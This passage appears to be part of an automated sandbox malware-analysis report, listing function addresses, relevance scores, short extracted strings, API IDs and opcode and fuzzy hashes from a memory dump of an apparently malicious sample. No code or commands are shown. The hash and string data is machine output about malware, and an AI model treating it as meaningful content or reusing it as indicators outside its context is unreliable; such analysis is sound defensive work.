                                                                                                                                                                                                                                        • String ID: pr$|~
                                                                                                                                                                                                                                        • API String ID: 0-4145297803
                                                                                                                                                                                                                                        • Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                                                                                                                                                                        • Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E
                                                                                                                                                                                                                                        Function 0042536C Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BLJB$X
                                                                                                                                                                                                                                        • API String ID: 0-2222927247
                                                                                                                                                                                                                                        • Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                                                                                                                                                                        • Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A
                                                                                                                                                                                                                                        Function 00427653 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: H.s $ij
                                                                                                                                                                                                                                        • API String ID: 0-4017226643
                                                                                                                                                                                                                                        • Opcode ID: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                                                                                                                                                                                        • Instruction ID: ae217f9daa6f4cce8b7d259f4259de876ba9e86de0ba8af5ed87a71d833a3b47
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F31DEB260D3908FD314CF65D48165FBBE2EBC6704F55892DE4C56B340CBB49906CB46
                                                                                                                                                                                                                                        Function 00415EE0 Relevance: 1.9, Strings: 1, Instructions: 625COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: 1/3T
                                                                                                                                                                                                                                        • API String ID: 2994545307-3266294232
                                                                                                                                                                                                                                        • Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                                                                                                                                                                                        • Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58
                                                                                                                                                                                                                                        Function 004266E7 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &tB
                                                                                                                                                                                                                                        • API String ID: 0-268467982
                                                                                                                                                                                                                                        • Opcode ID: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                                                                                                                                                                                        • Instruction ID: 06a34f82c29db43340e48ad1cbe7e395302b1ddd3c50ea808075b5b9ec83bf05
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5E169B5A083618FC7109F14E45136BB7E1AFDA304F0A486EE8C597342D639ED45CB9B
                                                                                                                                                                                                                                        Function 0042A630 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                        • Opcode ID: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                                                                                                                                                                                        • Instruction ID: f813c1fc85afd7223dda0e36a8c027de47e21e6ca96e88e37e758e8b14c45e64
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03C113B2B043215BD7149E25E44076BB7E5AF84310F59892FEC9687382E738DC59C78B
                                                                                                                                                                                                                                        Function 00417190 Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: RuA
                                                                                                                                                                                                                                        • API String ID: 0-3286949753
                                                                                                                                                                                                                                        • Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                                                                                                                                                                        • Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58
                                                                                                                                                                                                                                        Function 00421EE0 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: x%
                                                                                                                                                                                                                                        • API String ID: 0-3980080454
                                                                                                                                                                                                                                        • Opcode ID: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                                                                                                                                                                                        • Instruction ID: 53925fe815e81de9676dfe4c3668865c11de61aed011eb2c10e86570e61a59d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BA145B1604320ABCB10DF24DC91B6777E4FF94358F08492DEA858B391E7B9E905C766
                                                                                                                                                                                                                                        Function 0042AAD0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                        • Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B
                                                                                                                                                                                                                                        Function 00425F7D Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 1_B
                                                                                                                                                                                                                                        • API String ID: 0-2132359058
                                                                                                                                                                                                                                        • Opcode ID: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                                                                                                                                                                                        • Instruction ID: 5b09de0f708086b2db089408e795921656c95d083517461b5049a84f32a7c51a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8415972D09B7487C230DA64A81017BB6D5DB85310F9A847FF9C697342EB38AD01A7CA
                                                                                                                                                                                                                                        Function 0042B4BB Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: CUUI
                                                                                                                                                                                                                                        • API String ID: 0-173970609
                                                                                                                                                                                                                                        • Opcode ID: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                                                                                                                                                                                        • Instruction ID: 633f9cfe08b78efd1148aada0c0c4a0bea52aba14bf5254293374e99ea80dff2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9541E7A020C7E08ADB358F2594903ABBBE1DFD3304F5884ADC6C56B243C77988068B5A
                                                                                                                                                                                                                                        Function 00425230 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: cba`
                                                                                                                                                                                                                                        • API String ID: 2994545307-1926275841
                                                                                                                                                                                                                                        • Opcode ID: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                                                                                                                                                                                        • Instruction ID: beb69707a00ddb1e0f288a180930159145dfafadf277c1aff9f3426dfcb85bde
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47113536A44B204BC324CE289DC163777E1AB95314F95263DDCA9D33A1E278EC009AD9
                                                                                                                                                                                                                                        Function 00407470 Relevance: .6, Instructions: 625COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                                                                                                                                                                                        • Instruction ID: af49202ca076376fa415bca2a3091a328854806cafe53c7e33487b358e5641c5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9722B332A087118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47
                                                                                                                                                                                                                                        Function 0043CAC0 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                                                                                                                                                                                        • Instruction ID: a0fb517757f1b8da7777bae7579d9f52a382c29ac2183c4fd28747a7d9f1db1e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F402127AB04216CFC704CF28E8906AAB7F2FB8A311F1A847ED58593351D734AD55CB86
                                                                                                                                                                                                                                        Function 0043CBD6 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                                                                                                                                                                                        • Instruction ID: 0188f3e029ce03e8205a7a452b25b6dbd5bcd661a0513372e50984eaaf58ab41
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98E12F79B04216CFC704CF68E8906AAB7F2FB8A312F1A847EE585D3351D334A955CB85
                                                                                                                                                                                                                                        Function 00405910 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                                                                                                                                                                                        • Instruction ID: 292f23283d7cd07bb6fd19c8603031892cd16be448e450c68c3e166b8ce1a4f1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DAF1CF356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597791E679E904CB5A
                                                                                                                                                                                                                                        Function 0043CCE0 Relevance: .4, Instructions: 394COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                                                                                                                                                                                                                        • Instruction ID: b7c2eaf3338182462aad9b41d84ad1057b9f4e6ab3b7739cdaab2d2094e4d2b6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36C1007AA04216CFC704CF28E8906AAB7F2FB8A311F1A447DE98593351D734ED54CB85
                                                                                                                                                                                                                                        Function 004286F0 Relevance: .4, Instructions: 392COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                                                                                                                                                                                                                        • Instruction ID: 56b07d3b8ecf2697cfceb0b79347f06369642de1c8fee68a0e9743baf01ab03d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46C12EB060D3218AC314DF14D86272BB7F2EF92364F44891DF0D19B395EB789905CB9A
                                                                                                                                                                                                                                        Function 0043CD60 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                                                                                                                                                                                                                        • Instruction ID: 20c8691d40d2db25294344e9a87d3a2a4619c2758e90d916e0ff6e9b3fbd9dce
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95B1FE7AA14216CFC704CF68E8906AAB7F1FB8A311F1A447EE98693350D734ED54CB85
                                                                                                                                                                                                                                        Function 0043CE00 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                                                                                                                                                                                                                        • Instruction ID: 02c91c5c175dbfc798e5ae80a92b3f6d79b9f3e28c5cee1d4de64ad44bd3bbdb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28B1FE79A08216CFC704CF28E8906AAB7F1FB8A311F1A487DE985D3350D734E955CB95
                                                                                                                                                                                                                                        Function 00416E97 Relevance: .3, Instructions: 316COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                                                                                                                                                                                                                        • Instruction ID: 5a7d6a52498181c9cf4f87941996139a214d8b31775e9e11dc627d5a44ad725e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73A143B46047418FD724CF29C8D1B63B7E2AB5A304F14892ED59A87792D338E886CB58
                                                                                                                                                                                                                                        Function 0043DFB0 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                                                                                                                                                                                                                        • Instruction ID: 9eaef7f6449a926bdd011e6bf6c7dc343cb48eef6fbbacc1f9e318c96c7b604e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6891DF356053118BC718DF1AC890A2BB3F6EF9D710F19996DE8858B391E734EC01CB86
                                                                                                                                                                                                                                        Function 00428F5D Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                                                                                                                                                                                        • Instruction ID: 0033b059549c864885c35c4736f174911fb7ab2e2a7e13fdb612373215023671
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 939168B2A083558FC714CF25945226FF7A2AFD1304F98892EE4E687382D639DD05CB4A
                                                                                                                                                                                                                                        Function 0041CEA5 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                                                                                                                                                                                        • Instruction ID: 79a636d4ef35a115cd61f203c964b336e8654c9833e22f85933b964d871e8aad
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 824113B455835287CB209F289C413BBF3F1AFA2358F59455EE8C597380E738D992C36A
